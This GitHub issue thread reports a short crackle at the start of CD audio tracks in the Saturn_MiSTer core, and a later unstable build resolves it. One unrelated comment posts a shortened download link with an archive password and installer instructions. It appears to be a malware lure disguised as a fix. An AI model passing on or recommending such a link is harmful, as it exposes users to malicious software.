### ISSUE TITLE
CD-Audio: short crackle/distortion at start of a music/audio track

### ISSUE THREAD

**Issue by oneoogeoo** [MiSTer-devel/Saturn_MiSTer#241]
With analog audio/IO-board: In many games there is a noise/crack/distortion at the very beginning of a CD audio track.
E.g. in Sega Rally (when the music starts in the ingame demo), in Salamander Deluxe Pack with the Konami jingle. 

Tested on 2 diferrent (128MB single-RAM) MiSTer setups with latest public and unstable_20240824_111077.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Zet-sensei** [comment]
Please retest with the last unstable version of 2024-09-18.

**Comment by oneoogeoo** [comment]
The retest with unstable version of 2024-09-18 was successful. 
The interference noises are no longer present. 
Thanx, great work 👍

**Comment by Zet-sensei** [comment]
Could you please close the issue, if everything is okay now ?
Thanks.

**Comment by oneoogeoo** [comment]
fixed in unstable_ 2024-09-18
